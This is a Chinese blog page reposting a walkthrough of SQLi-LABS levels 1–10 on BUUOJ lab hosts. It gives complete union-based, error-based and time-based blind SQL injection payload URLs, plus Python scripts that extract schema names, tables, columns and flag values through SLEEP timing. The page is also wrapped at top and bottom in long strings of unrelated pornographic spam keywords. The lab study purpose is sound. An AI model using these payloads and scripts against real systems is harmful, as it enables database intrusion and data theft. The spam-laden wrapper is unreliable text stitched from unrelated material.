日韩av黄I国产麻豆传媒I国产91av视频在线观看I日韩一区二区三区在线看I美女国产在线I麻豆视频国产在线观看I成人黄色短片

歡迎訪問 生活随笔!

生活随笔

當前位置: 首頁 > 运维知识 > 数据库 >内容正文

数据库

SQLi-LABS(1~10关详解)

發(fā)布時間:2024/9/30 数据库 45 豆豆
生活随笔 收集整理的這篇文章主要介紹了 SQLi-LABS(1~10关详解) 小編覺得挺不錯的,現(xiàn)在分享給大家,幫大家做個參考.

SQLi-LABS Less-1

查看題目環(huán)境

首先可以看到這題傳入id=1后,會有回顯,顯示出該條記錄

測試注入點

構造payload

http://b56d9d95-d647-4065-b45b-62369cbbd4b8.node1.buuoj.cn/Less-1/?id=1'or '1'='1

頁面正常回顯

payload

http://b56d9d95-d647-4065-b45b-62369cbbd4b8.node1.buuoj.cn/Less-1/?id=1'and '1'='2

頁面無數(shù)據(jù)顯示

由此可以判斷出:此處具有Sql注入漏洞

SQL注入

因為前面測得具有回顯,所以采取union聯(lián)合查詢
流程為

查找列數(shù)

http://b56d9d95-d647-4065-b45b-62369cbbd4b8.node1.buuoj.cn/Less-1/?id=1' order by 3 --+

–+用于注釋掉sql語句后面的內容,最終查出返回的列數(shù)為3列(列數(shù)一個一個試,最大的一個數(shù),且不報Unknown column ‘*’ in ‘order clause’)

查詢數(shù)據(jù)庫

http://b56d9d95-d647-4065-b45b-62369cbbd4b8.node1.buuoj.cn/Less-1/?id=-1' union select 1,1,(SELECT GROUP_CONCAT(schema_name) FROM information_schema.schemata)'

這邊id傳入一個數(shù)據(jù)庫中沒有的值即可,因為如果是數(shù)據(jù)庫中存在的值,即會返回多條記錄,會顯示前一個找到的值,而我們想要的將無法顯示。
同時我們使用GROUP_CONCAT將查詢到的數(shù)據(jù)庫名拼接顯示

查詢數(shù)據(jù)庫中的表

http://b56d9d95-d647-4065-b45b-62369cbbd4b8.node1.buuoj.cn/Less-1/?id=-1' union select 1,1,(SELECT GROUP_CONCAT(TABLE_NAME) FROM information_schema.tables WHERE TABLE_SCHEMA="ctftraining" )'

查表中的字段

http://b56d9d95-d647-4065-b45b-62369cbbd4b8.node1.buuoj.cn/Less-1/?id=-1' union select 1,1,(SELECT GROUP_CONCAT(column_name) FROM information_schema.columns WHERE table_name = 'flag')'

查數(shù)據(jù)

http://b56d9d95-d647-4065-b45b-62369cbbd4b8.node1.buuoj.cn/Less-1/?id=-1' union select 1,1,(SELECT GROUP_CONCAT(flag) FROM ctftraining.flag)'

SQLi-LABS Less-2

查看題目環(huán)境

首先可以看到這題傳入id=1后,會有回顯,顯示出該條記錄

測試注入點

構造payload

http://b56d9d95-d647-4065-b45b-62369cbbd4b8.node1.buuoj.cn/Less-2/?id=1'

可以發(fā)現(xiàn)報錯信息如下,我們可以知道是MariaDB數(shù)據(jù)庫

發(fā)現(xiàn)我們用單引號閉合是多余的
payload

http://b56d9d95-d647-4065-b45b-62369cbbd4b8.node1.buuoj.cn/Less-2/?id=1 or '1'='1'

正常顯示

payload

http://b56d9d95-d647-4065-b45b-62369cbbd4b8.node1.buuoj.cn/Less-2/?id=1 and '1'='2'

頁面無數(shù)據(jù)顯示

由此可以判斷出:此處具有Sql注入漏洞

SQL注入

因為前面測得具有回顯,所以采取union聯(lián)合查詢
流程為

查找列數(shù)

http://b56d9d95-d647-4065-b45b-62369cbbd4b8.node1.buuoj.cn/Less-2/?id=1 order by 3 --+

–+用于注釋掉sql語句后面的內容,最終查出返回的列數(shù)為3列(列數(shù)一個一個試,最大的一個數(shù),且不報Unknown column ‘*’ in ‘order clause’)

查詢數(shù)據(jù)庫

http://b56d9d95-d647-4065-b45b-62369cbbd4b8.node1.buuoj.cn/Less-2/?id=-1 union select 1,1,(SELECT GROUP_CONCAT(schema_name) FROM information_schema.schemata)

這邊id傳入一個數(shù)據(jù)庫中沒有的值即可,因為如果是數(shù)據(jù)庫中存在的值,即會返回多條記錄,會顯示前一個找到的值,而我們想要的將無法顯示。
同時我們使用GROUP_CONCAT將查詢到的數(shù)據(jù)庫名拼接顯示

查詢數(shù)據(jù)庫中的表

http://b56d9d95-d647-4065-b45b-62369cbbd4b8.node1.buuoj.cn/Less-2/?id=-1 union select 1,1,(SELECT GROUP_CONCAT(TABLE_NAME) FROM information_schema.tables WHERE TABLE_SCHEMA="ctftraining" )

查表中的字段

http://b56d9d95-d647-4065-b45b-62369cbbd4b8.node1.buuoj.cn/Less-2/?id=-1 union select 1,1,(SELECT GROUP_CONCAT(column_name) FROM information_schema.columns WHERE table_name = 'flag')

查數(shù)據(jù)

http://b56d9d95-d647-4065-b45b-62369cbbd4b8.node1.buuoj.cn/Less-2/?id=-1 union select 1,1,(SELECT GROUP_CONCAT(flag) FROM ctftraining.flag)

SQLi-LABS Less-3

查看題目環(huán)境

首先可以看到這題傳入id=1后,會有回顯,顯示出該條記錄

測試注入點

構造payload
http://b56d9d95-d647-4065-b45b-62369cbbd4b8.node1.buuoj.cn/Less-3/?id=1’
可以發(fā)現(xiàn)報錯信息如下,我們可以知道是MariaDB數(shù)據(jù)庫

發(fā)現(xiàn)我們應該用’)閉合
payload

http://b56d9d95-d647-4065-b45b-62369cbbd4b8.node1.buuoj.cn/Less-3/?id=1') or '1'='1' --+

正常顯示

payload

http://b56d9d95-d647-4065-b45b-62369cbbd4b8.node1.buuoj.cn/Less-3/?id=1') and '1'='2' --+

頁面無數(shù)據(jù)顯示

由此可以判斷出:此處具有Sql注入漏洞

SQL注入

因為前面測得具有回顯,所以采取union聯(lián)合查詢
流程為

查找列數(shù)

http://b56d9d95-d647-4065-b45b-62369cbbd4b8.node1.buuoj.cn/Less-3/?id=1') order by 3 --+

–+用于注釋掉sql語句后面的內容,最終查出返回的列數(shù)為3列(列數(shù)一個一個試,最大的一個數(shù),且不報Unknown column ‘*’ in ‘order clause’)

查詢數(shù)據(jù)庫

http://b56d9d95-d647-4065-b45b-62369cbbd4b8.node1.buuoj.cn/Less-3/?id=-1') union select 1,1,(SELECT GROUP_CONCAT(schema_name) FROM information_schema.schemata) --+

這邊id傳入一個數(shù)據(jù)庫中沒有的值即可,因為如果是數(shù)據(jù)庫中存在的值,即會返回多條記錄,會顯示前一個找到的值,而我們想要的將無法顯示。
同時我們使用GROUP_CONCAT將查詢到的數(shù)據(jù)庫名拼接顯示

查詢數(shù)據(jù)庫中的表

http://b56d9d95-d647-4065-b45b-62369cbbd4b8.node1.buuoj.cn/Less-3/?id=-1') union select 1,1,(SELECT GROUP_CONCAT(TABLE_NAME) FROM information_schema.tables WHERE TABLE_SCHEMA="ctftraining" ) --+

查表中的字段

http://b56d9d95-d647-4065-b45b-62369cbbd4b8.node1.buuoj.cn/Less-3/?id=-1') union select 1,1,(SELECT GROUP_CONCAT(column_name) FROM information_schema.columns WHERE table_name = 'flag') --+

查數(shù)據(jù)

http://b56d9d95-d647-4065-b45b-62369cbbd4b8.node1.buuoj.cn/Less-3/?id=-1') union select 1,1,(SELECT GROUP_CONCAT(flag) FROM ctftraining.flag) --+

SQLi-LABS Less-4

查看題目環(huán)境

首先可以看到這題傳入id=1后,會有回顯,顯示出該條記錄

測試注入點

構造payload

http://b56d9d95-d647-4065-b45b-62369cbbd4b8.node1.buuoj.cn/Less-4/?id=1'

發(fā)現(xiàn)用單引號閉合沒有報錯

嘗試使用雙引號,可以發(fā)現(xiàn)報錯信息如下,我們可以知道是MariaDB數(shù)據(jù)庫

發(fā)現(xiàn)我們應該用")閉合
payload

http://b56d9d95-d647-4065-b45b-62369cbbd4b8.node1.buuoj.cn/Less-4/?id=1") or '1'='1' --+

正常顯示

payload

http://b56d9d95-d647-4065-b45b-62369cbbd4b8.node1.buuoj.cn/Less-4/?id=1") and '1'='2' --+

頁面無數(shù)據(jù)顯示

由此可以判斷出:此處具有Sql注入漏洞

SQL注入

因為前面測得具有回顯,所以采取union聯(lián)合查詢
流程為

查找列數(shù)

http://b56d9d95-d647-4065-b45b-62369cbbd4b8.node1.buuoj.cn/Less-4/?id=1") order by 3 --+

–+用于注釋掉sql語句后面的內容,最終查出返回的列數(shù)為3列(列數(shù)一個一個試,最大的一個數(shù),且不報Unknown column ‘*’ in ‘order clause’)

查詢數(shù)據(jù)庫

http://b56d9d95-d647-4065-b45b-62369cbbd4b8.node1.buuoj.cn/Less-4/?id=-1") union select 1,1,(SELECT GROUP_CONCAT(schema_name) FROM information_schema.schemata) --+

這邊id傳入一個數(shù)據(jù)庫中沒有的值即可,因為如果是數(shù)據(jù)庫中存在的值,即會返回多條記錄,會顯示前一個找到的值,而我們想要的將無法顯示。
同時我們使用GROUP_CONCAT將查詢到的數(shù)據(jù)庫名拼接顯示

查詢數(shù)據(jù)庫中的表

http://b56d9d95-d647-4065-b45b-62369cbbd4b8.node1.buuoj.cn/Less-4/?id=-1") union select 1,1,(SELECT GROUP_CONCAT(TABLE_NAME) FROM information_schema.tables WHERE TABLE_SCHEMA="ctftraining" ) --+

查表中的字段

http://b56d9d95-d647-4065-b45b-62369cbbd4b8.node1.buuoj.cn/Less-4/?id=-1") union select 1,1,(SELECT GROUP_CONCAT(column_name) FROM information_schema.columns WHERE table_name = 'flag') --+

查數(shù)據(jù)

http://b56d9d95-d647-4065-b45b-62369cbbd4b8.node1.buuoj.cn/Less-4/?id=-1") union select 1,1,(SELECT GROUP_CONCAT(flag) FROM ctftraining.flag) --+

SQLi-LABS Less-5

查看題目環(huán)境

首先可以看到這題傳入id=1后,如果存在id,則會返回You are in…否則就沒有任何顯示

測試注入點

構造payload

http://4de79f7f-a387-428e-b1f4-8cb2bdb5aadc.node1.buuoj.cn/Less-5/?id=1'

有報錯信息如下
由于沒有頁面沒有數(shù)據(jù)顯示,所以無法使用Union聯(lián)合查詢,嘗試報錯注入

SQL注入

因為前面測得沒有回顯數(shù)據(jù),所以采取報錯注入
報錯注入:
(1). 通過floor報錯

and (select 1 from (select count(*),concat((payload),floor (rand(0)*2))x from information_schema.tables group by x)a)

其中payload為你要插入的SQL語句
需要注意的是該語句將 輸出字符長度限制為64個字符
(2). 通過updatexml報錯

and updatexml(1,payload,1)

同樣該語句對輸出的字符長度也做了限制,其最長輸出32位
并且該語句對payload的反悔類型也做了限制,只有在payload返回的不是xml格式才會生效
(3). 通過ExtractValue報錯

and extractvalue(1, payload)

我比較喜歡用的是floor報錯注入,因為能返回的字符串長度最長
流程為

查詢數(shù)據(jù)庫

http://4de79f7f-a387-428e-b1f4-8cb2bdb5aadc.node1.buuoj.cn/Less-5/?id=1' and (select 1 from (select count(*),concat((SELECT schema_name FROM information_schema.schemata limit 0,1),floor (rand(0)*2))x from information_schema.tables group by x)a) --+

通過報錯注入,因為所有數(shù)據(jù)庫拼接的長度大于了64個字符,所以使用limit 一個一個數(shù)據(jù)庫查

查詢數(shù)據(jù)庫中的表

http://4de79f7f-a387-428e-b1f4-8cb2bdb5aadc.node1.buuoj.cn/Less-5/?id=1' and (select 1 from (select count(*),concat((SELECT TABLE_NAME FROM information_schema.tables WHERE TABLE_SCHEMA="ctftraining" limit 0,1),floor (rand(0)*2))x from information_schema.tables group by x)a) --+

查表中的字段

http://4de79f7f-a387-428e-b1f4-8cb2bdb5aadc.node1.buuoj.cn/Less-5/?id=1' and (select 1 from (select count(*),concat((SELECT column_name FROM information_schema.columns WHERE table_name = 'flag' limit 0,1),floor (rand(0)*2))x from information_schema.tables group by x)a) --+

查數(shù)據(jù)

http://4de79f7f-a387-428e-b1f4-8cb2bdb5aadc.node1.buuoj.cn/Less-5/?id=1' and (select 1 from (select count(*),concat((SELECT flag FROM ctftraining.flag),floor (rand(0)*2))x from information_schema.tables group by x)a) --+

SQLi-LABS Less-6

查看題目環(huán)境

首先可以看到這題傳入id=1后,如果存在id,則會返回You are in…否則就沒有任何顯示

測試注入點

構造payload

http://4de79f7f-a387-428e-b1f4-8cb2bdb5aadc.node1.buuoj.cn/Less-6/?id=1'

正常顯示

構造payload

http://4de79f7f-a387-428e-b1f4-8cb2bdb5aadc.node1.buuoj.cn/Less-6/?id=1"


有報錯信息如下
由于沒有頁面沒有數(shù)據(jù)顯示,所以無法使用Union聯(lián)合查詢,嘗試報錯注入

SQL注入

因為前面測得沒有回顯數(shù)據(jù),所以采取報錯注入
報錯注入:
(1). 通過floor報錯

and (select 1 from (select count(*),concat((payload),floor (rand(0)*2))x from information_schema.tables group by x)a)

其中payload為你要插入的SQL語句
需要注意的是該語句將 輸出字符長度限制為64個字符
(2). 通過updatexml報錯

and updatexml(1,payload,1)

同樣該語句對輸出的字符長度也做了限制,其最長輸出32位
并且該語句對payload的反悔類型也做了限制,只有在payload返回的不是xml格式才會生效
(3). 通過ExtractValue報錯

and extractvalue(1, payload)

我比較喜歡用的是floor報錯注入,因為能返回的字符串長度最長
流程為

查詢數(shù)據(jù)庫

http://4de79f7f-a387-428e-b1f4-8cb2bdb5aadc.node1.buuoj.cn/Less-6/?id=1" and (select 1 from (select count(*),concat((SELECT schema_name FROM information_schema.schemata limit 0,1),floor (rand(0)*2))x from information_schema.tables group by x)a) --+

通過報錯注入,因為所有數(shù)據(jù)庫拼接的長度大于了64個字符,所以使用limit 一個一個數(shù)據(jù)庫查

查詢數(shù)據(jù)庫中的表

http://4de79f7f-a387-428e-b1f4-8cb2bdb5aadc.node1.buuoj.cn/Less-6/?id=1" and (select 1 from (select count(*),concat((SELECT TABLE_NAME FROM information_schema.tables WHERE TABLE_SCHEMA="ctftraining" limit 0,1),floor (rand(0)*2))x from information_schema.tables group by x)a) --+

查表中的字段

http://4de79f7f-a387-428e-b1f4-8cb2bdb5aadc.node1.buuoj.cn/Less-6/?id=1" and (select 1 from (select count(*),concat((SELECT column_name FROM information_schema.columns WHERE table_name = 'flag' limit 0,1),floor (rand(0)*2))x from information_schema.tables group by x)a) --+

查數(shù)據(jù)

http://4de79f7f-a387-428e-b1f4-8cb2bdb5aadc.node1.buuoj.cn/Less-6/?id=1" and (select 1 from (select count(*),concat((SELECT flag FROM ctftraining.flag),floor (rand(0)*2))x from information_schema.tables group by x)a) --+

SQLi-LABS Less-7

查看題目環(huán)境

首先可以看到這題傳入id=1后,如果存在id,則會返回You are in…Use outfile…

輸入不存在的id,或者嘗試sql注入都不會顯示具體報錯信息

所以聯(lián)合查詢和報錯注入都失效了

測試注入點

構造payload

http://e40ffbdc-1bae-4621-a7c4-4326289ff1d6.node1.buuoj.cn/Less-7/?id=1'))

正常顯示

SQL注入

首先,由題目環(huán)境觀察可知,聯(lián)合查詢和報錯注入都用不了,但是這邊又可以執(zhí)行我們輸入的東西,所以我是用的時間盲注。

查詢列數(shù)

http://e40ffbdc-1bae-4621-a7c4-4326289ff1d6.node1.buuoj.cn/Less-7/?id=1')) order by 3 --+

時間盲注腳本

使用腳本的sleep函數(shù)時間自行控制,因為不同服務器的響應時間不同,sleep時間越久,越準確。因為若sleep時間短了,有可能因為本身服務器響應較慢導致爆破出來的值錯誤

import requests import time flag = '' table="abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890_{}" while True:for i in table:ss = time.time()data = {'datebase':'''ELT(left((SELECT schema_name FROM information_schema.schemata limit 0,1),{})='{}{}',SLEEP(5))'''.format(len(flag)+1,flag, i),'table':'''ELT(left((SELECT TABLE_NAME FROM information_schema.tables WHERE TABLE_SCHEMA="ctftraining" limit 0,1),{})='{}{}',SLEEP(5))'''.format(len(flag)+1,flag, i),'column':'''ELT(left((SELECT column_name FROM information_schema.columns WHERE table_name = 'flag' limit 0,1),{})='{}{}',SLEEP(5))'''.format(len(flag)+1,flag, i),'flag':'''ELT(left((SELECT flag FROM ctftraining.flag limit 0,1),{})='{}{}',SLEEP(5))'''.format(len(flag)+1,flag, i),}#url="http://e40ffbdc-1bae-4621-a7c4-4326289ff1d6.node1.buuoj.cn/Less-7/?id=1')) union select 1,1,("+data['datebase']+")--+" #查找數(shù)據(jù)庫#url="http://e40ffbdc-1bae-4621-a7c4-4326289ff1d6.node1.buuoj.cn/Less-7/?id=1')) union select 1,1,("+data['table']+")--+" #查表名#url="http://e40ffbdc-1bae-4621-a7c4-4326289ff1d6.node1.buuoj.cn/Less-7/?id=1')) union select 1,1,("+data['column']+")--+" #查字段名url="http://e40ffbdc-1bae-4621-a7c4-4326289ff1d6.node1.buuoj.cn/Less-7/?id=1')) union select 1,1,("+data['flag']+")--+" #查數(shù)據(jù)t=requests.get(url)if time.time()-ss>=4:flag += iprint (flag) break

SQLi-LABS Less-8

查看題目環(huán)境

首先可以看到這題傳入id=1后,如果存在id,則會返回You are in…否則就沒有任何顯示

測試注入點

構造payload

http://e40ffbdc-1bae-4621-a7c4-4326289ff1d6.node1.buuoj.cn/Less-8/?id=1'

沒有回顯
構造payload

http://e40ffbdc-1bae-4621-a7c4-4326289ff1d6.node1.buuoj.cn/Less-8/?id=1'--+

成功閉合

SQL注入

我這邊使用SQL盲注得到flag
主要是讓他執(zhí)行查詢,然后將查到的值與我們的table比較,若相等則調用SLEEP函數(shù),通過判斷響應時間,爆破出數(shù)據(jù)庫內容

查詢列數(shù)

http://e40ffbdc-1bae-4621-a7c4-4326289ff1d6.node1.buuoj.cn/Less-8/?id=1' order by 3 --+

時間盲注腳本

使用腳本的sleep函數(shù)時間自行控制,因為不同服務器的響應時間不同,sleep時間越久,越準確。因為若sleep時間短了,有可能因為本身服務器響應較慢導致爆破出來的值錯誤

import requests import time flag = '' table="abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890_{}" while True:for i in table:ss = time.time()data = {'datebase':'''ELT(left((SELECT schema_name FROM information_schema.schemata limit 0,1),{})='{}{}',SLEEP(2))'''.format(len(flag)+1,flag, i),'table':'''ELT(left((SELECT TABLE_NAME FROM information_schema.tables WHERE TABLE_SCHEMA="ctftraining" limit 0,1),{})='{}{}',SLEEP(2))'''.format(len(flag)+1,flag, i),'column':'''ELT(left((SELECT column_name FROM information_schema.columns WHERE table_name = 'flag' limit 0,1),{})='{}{}',SLEEP(2))'''.format(len(flag)+1,flag, i),'flag':'''ELT(left((SELECT flag FROM ctftraining.flag limit 0,1),{})='{}{}',SLEEP(5))'''.format(len(flag)+1,flag, i),}#url="http://e40ffbdc-1bae-4621-a7c4-4326289ff1d6.node1.buuoj.cn/Less-8/?id=1%27 union select 1,1,("+data['datebase']+")--+" 查找數(shù)據(jù)庫#url="http://e40ffbdc-1bae-4621-a7c4-4326289ff1d6.node1.buuoj.cn/Less-8/?id=1%27 union select 1,1,("+data['table']+")--+" 查表名#url="http://e40ffbdc-1bae-4621-a7c4-4326289ff1d6.node1.buuoj.cn/Less-8/?id=1%27 union select 1,1,("+data['column']+")--+" 查字段名url="http://e40ffbdc-1bae-4621-a7c4-4326289ff1d6.node1.buuoj.cn/Less-8/?id=1%27 union select 1,1,("+data['flag']+")--+" #查數(shù)據(jù)t=requests.get(url)if time.time()-ss>=4:flag += iprint (flag) break

SQLi-LABS Less-9

查看題目環(huán)境

首先可以看到這題id無論傳入什么,都會顯示這個頁面

測試注入點

因為沒有任何有意義的回顯,所以一般就是時間盲注了,但是由于不知道他的sql語句是怎么樣的,所以寫個腳本測試下如何去閉合前面內容

import requests import time ss = time.time() url="http://a70061cb-45c2-40c8-af03-307f35da6017.node1.buuoj.cn/Less-9/?id=1'%20and%20sleep(5)--+" t=requests.get(url) if time.time()-ss>=4:print("is Time")

SQL注入

時間盲注腳本

使用腳本的sleep函數(shù)時間自行控制,因為不同服務器的響應時間不同,sleep時間越久,越準確。因為若sleep時間短了,有可能因為本身服務器響應較慢導致爆破出來的值錯誤

import requests import time flag = '' #table="abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890_{}" n=1 while True:for i in range(128):ss = time.time()data = {'datebase':"SELECT schema_name FROM information_schema.schemata limit 0,1",'table':'SELECT TABLE_NAME FROM information_schema.tables WHERE TABLE_SCHEMA="ctftraining" limit 0,1','column':'SELECT column_name FROM information_schema.columns WHERE table_name = "flag"','flag':'SELECT flag FROM ctftraining.flag limit 0,1'}#url="http://a70061cb-45c2-40c8-af03-307f35da6017.node1.buuoj.cn/Less-9/?id=1%27 and if(ascii(substr(("+data['datebase']+"),"+str(n)+","+str(n)+"))>"+str(i)+", 0,sleep(5))--+" #查找數(shù)據(jù)庫#url="http://a70061cb-45c2-40c8-af03-307f35da6017.node1.buuoj.cn/Less-9/?id=1%27 and if(ascii(substr(("+data['table']+"),"+str(n)+","+str(n)+"))>"+str(i)+", 0,sleep(5))--+" 查表名#url="http://a70061cb-45c2-40c8-af03-307f35da6017.node1.buuoj.cn/Less-9/?id=1%27 and if(ascii(substr(("+data['column']+"),"+str(n)+","+str(n)+"))>"+str(i)+", 0,sleep(5))--+" 查字段名url="http://a70061cb-45c2-40c8-af03-307f35da6017.node1.buuoj.cn/Less-9/?id=1%27 and if(ascii(substr(("+data['flag']+"),"+str(n)+","+str(n)+"))>"+str(i)+", 0,sleep(5))--+" #查數(shù)據(jù)t=requests.get(url)if time.time()-ss>=4:n=n+1flag += chr(i)print (flag)break

SQLi-LABS Less-10

查看題目環(huán)境

首先可以看到這題id無論傳入什么,都會顯示這個頁面

測試注入點

因為沒有任何有意義的回顯,所以一般就是時間盲注了,但是由于不知道他的sql語句是怎么樣的,所以寫個腳本測試下如何去閉合前面內容

import requests import time ss = time.time() url="http://a70061cb-45c2-40c8-af03-307f35da6017.node1.buuoj.cn/Less-10/?id=1%22%20and%20sleep(5)--+" t=requests.get(url) if time.time()-ss>=4:print("is Time")

發(fā)現(xiàn)用雙引號成功閉合

SQL注入

時間盲注腳本

使用腳本的sleep函數(shù)時間自行控制,因為不同服務器的響應時間不同,sleep時間越久,越準確。因為若sleep時間短了,有可能因為本身服務器響應較慢導致爆破出來的值錯誤

import requests import time flag = '' table="abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890_{}" while True:for i in table:ss = time.time()data = {'datebase':'''ELT(left((SELECT schema_name FROM information_schema.schemata limit 0,1),{})='{}{}',SLEEP(5))'''.format(len(flag)+1,flag, i),'table':'''ELT(left((SELECT TABLE_NAME FROM information_schema.tables WHERE TABLE_SCHEMA="ctftraining" limit 0,1),{})='{}{}',SLEEP(5))'''.format(len(flag)+1,flag, i),'column':'''ELT(left((SELECT column_name FROM information_schema.columns WHERE table_name = 'flag' limit 0,1),{})='{}{}',SLEEP(5))'''.format(len(flag)+1,flag, i),'flag':'''ELT(left((SELECT flag FROM ctftraining.flag limit 0,1),{})='{}{}',SLEEP(5))'''.format(len(flag)+1,flag, i),}#url="http://a70061cb-45c2-40c8-af03-307f35da6017.node1.buuoj.cn/Less-10/?id=1%22 and "+data['datebase']+" --+" #查找數(shù)據(jù)庫#url="http://a70061cb-45c2-40c8-af03-307f35da6017.node1.buuoj.cn/Less-10/?id=1%22 and "+data['table']+"--+" #查表名#url="http://a70061cb-45c2-40c8-af03-307f35da6017.node1.buuoj.cn/Less-10/?id=1%22 and "+data['column']+"--+" #查字段名url="http://a70061cb-45c2-40c8-af03-307f35da6017.node1.buuoj.cn/Less-10/?id=1%22 and "+data['flag']+"--+" #查數(shù)據(jù)t=requests.get(url)if time.time()-ss>=4:flag += iprint (flag)break

總結

以上是生活随笔為你收集整理的SQLi-LABS(1~10关详解)的全部內容,希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯,歡迎將生活随笔推薦給好友。

国产精品成人一区二区 | 人人爽人人干 | 国产精品一区在线播放 | 亚洲伦理一区二区 | 亚洲精品视频在线免费 | 欧美精彩视频在线观看 | 美女网站视频一区 | 在线一级片| av经典在线 | 亚洲 中文 在线 精品 | 国产精品12| 天天av天天 | 97人人看| 午夜精品久久久久久久99婷婷 | 香蕉影院在线观看 | 夜夜骑日日 | 又爽又黄又刺激的视频 | 91九色丨porny丨丰满6 | 国内精品视频在线 | 亚洲精品一区二区三区四区高清 | 激情综合亚洲 | 国产精品久久久久久久久久久免费 | 中文字幕在线人 | 国产黄色片免费在线观看 | 五月花丁香婷婷 | 四虎最新域名 | 欧美激情另类文学 | 国产精选在线 | 国产xx在线 | 日本中文在线观看 | 日韩精品一区二区在线观看 | 国产小视频免费观看 | 国产精品区二区三区日本 | 欧美激情xxxx| 亚洲精品在线免费看 | 国内少妇自拍视频一区 | 久久久www | 96国产精品视频 | 国产福利一区二区在线 | 国产手机在线视频 | 国产免费小视频 | 亚洲精品玖玖玖av在线看 | 欧美精品在线观看一区 | 91免费观看视频网站 | 五月婷婷一级片 | 亚洲美女久久 | 久久精品在线免费观看 | 日韩在线国产精品 | 91看片在线 | 国产专区在线播放 | 天天拍夜夜拍 | 婷婷色中文字幕 | 日韩国产精品一区 | 日韩精品免费一区二区 | 免费高清看电视网站 | 国产黄色特级片 | 久色 网| 成人18视频| 激情欧美一区二区三区 | 日韩精品欧美精品 | 婷婷资源站 | 亚洲国产精品成人精品 | 黄色软件视频大全免费下载 | 免费 在线 中文 日本 | 国产精品久久久av久久久 | 亚洲一区网站 | 日韩av免费大片 | 欧美日韩在线视频一区二区 | 色香com. | 久久精品系列 | 国产精品精品 | 精品久久国产精品 | 在线成人高清电影 | 国产精品 9999 | 欧美一级小视频 | 视频一区在线免费观看 | 婷婷夜夜 | 久久久91精品国产一区二区精品 | 香蕉手机在线 | 天天玩天天干 | 91视频久久久 | 69久久久 | 最近高清中文字幕在线国语5 | 午夜性盈盈 | www.久草.com| 在线免费色 | 国产精品成人一区二区三区吃奶 | 韩国av一区 | 欧美色婷 | 久久国产视频网 | 国产成人精品女人久久久 | 亚洲免费婷婷 | 亚洲欧洲国产精品 | www.激情五月.com | 免费91在线| 97视频在线观看网址 | 精品国产乱码久久久久 | 三级黄免费看 | 91视频在线观看下载 | 日本一区二区免费在线观看 | 一区二区在线影院 | 久久五月婷婷丁香 | 最近2019中文免费高清视频观看www99 | 免费看黄视频 | 国产色 在线 | 欧美日韩国产一区 | 久久综合日| 欧美久久久久 | 日本久久久亚洲精品 | 91精品网站 | 久久久久成 | 5月丁香婷婷综合 | a精品视频 | 亚洲 中文 在线 精品 | 国产不卡在线视频 | 99精品国产高清在线观看 | 视频一区二区在线 | 国产一区免费观看 | 亚洲精品久久久蜜桃 | 天天操天天摸天天干 | 欧美日韩一级视频 | 在线播放 日韩专区 | 少妇按摩av| 国产又粗又长又硬免费视频 | 天天爽网站 | 国产精品久久久久久久久久久免费 | 天天干天天操天天入 | 欧美久久久影院 | 国产福利91精品一区二区三区 | 综合色站导航 | 成人中文字幕在线观看 | 国产成人高清在线 | 欧美精品乱码久久久久 | 911国产在线观看 | 最近中文字幕大全 | 在线观看黄网 | 国产高清久久久久 | 97精品国产aⅴ | 亚州精品在线视频 | 黄色一级大片免费看 | av在线影片 | 欧美一级特黄aaaaaa大片在线观看 | 欧美不卡视频在线 | 中文字幕日韩av | 九九九九热精品免费视频点播观看 | 久久视精品 | 玖玖玖在线 | 亚洲成a人片在线www | 亚洲电影毛片 | 精品美女久久久久久免费 | 免费日韩 精品中文字幕视频在线 | 久草在线视频首页 | 久久伊99综合婷婷久久伊 | 成人免费观看av | 黄色官网在线观看 | 五月婷婷欧美视频 | 97国产情侣爱久久免费观看 | 欧美精品亚洲二区 | 99草在线视频 | 亚洲桃花综合 | 开心激情五月婷婷 | 一区精品在线 | 在线国产99 | 又长又大又黑又粗欧美 | 亚洲欧洲美洲av | 一级片免费在线 | 久久久久久久久黄色 | 天天干天天想 | 亚洲精品www久久久 www国产精品com | 男女视频91| 久久精品免费观看 | 日韩av黄| 久久一区二区三区日韩 | 国产日产在线观看 | 国产精品第2页 | 亚洲精选视频在线 | 久久久久久久久久久久久久av | 在线黄色国产 | 成人精品一区二区三区中文字幕 | 国产精品美女久久久 | 免费视频一区二区 | 亚洲精品福利在线观看 | 一区二区三区在线观看免费 | 91视频大全 | 麻豆小视频在线观看 | 久久免视频 | 视频91在线 | 亚洲福利精品 | av看片在线 | 午夜久久福利影院 | 久久这里只有精品视频首页 | 久色婷婷 | 国产精品va最新国产精品视频 | 久草在线免 | 毛片视频电影 | 天天爽夜夜爽人人爽一区二区 | 91久久精品日日躁夜夜躁国产 | 久久精品免费 | 亚洲精品乱码久久久久久蜜桃欧美 | 国产精品久久人 | 四川妇女搡bbbb搡bbbb搡 | 亚洲成人网在线 | 免费看黄电影 | 97理论电影| 久久福利在线 | 在线观看中文字幕一区 | 日本韩国欧美在线观看 | 99久久久久久久 | 精品在线视频观看 | 欧美国产日韩在线观看 | 日韩有码在线观看视频 | 人人射 | 免费观看成人网 | 四虎国产精品成人免费影视 | 久久久三级视频 | 黄色三级视频片 | 国产一区二区在线精品 | 射射射av| 中文字幕在线色 | 99爱这里只有精品 | 欧美日韩国产高清视频 | 国产成人在线免费观看 | 91黄视频在线观看 | 中文字幕美女免费在线 | 亚洲黄色一级大片 | 国产裸体视频网站 | 99久久电影 | 色噜噜狠狠狠狠色综合久不 | 在线观看视频福利 | 一级片黄色片网站 | 日韩视频中文字幕在线观看 | 免费在线h| 福利一区二区 | 激情五月婷婷网 | 激情动态| 成人一区二区三区在线观看 | 国产亚洲va综合人人澡精品 | 中文字幕亚洲综合久久五月天色无吗'' | 在线视频观看你懂的 | 免费久久网站 | av一区二区在线观看中文字幕 | www99精品 | 国产综合精品久久 | 夜夜狠狠 | www.夜夜操.com | 在线观看免费av网 | 亚洲一二三久久 | 日本三级香港三级人妇99 | 五月天六月婷婷 | 欧美日韩高清一区二区 | 国产精品免费看久久久8精臀av | 久久久精品一区二区 | 婷婷天天色 | 国产精品美| 日韩高清不卡一区二区三区 | 91精品伦理 | 在线观看视频免费大全 | 亚洲在线观看av | 精品久久一区 | 日韩大片在线看 | a爱爱视频 | 成人国产精品免费 | 中文字幕av最新更新 | 亚洲精品在线国产 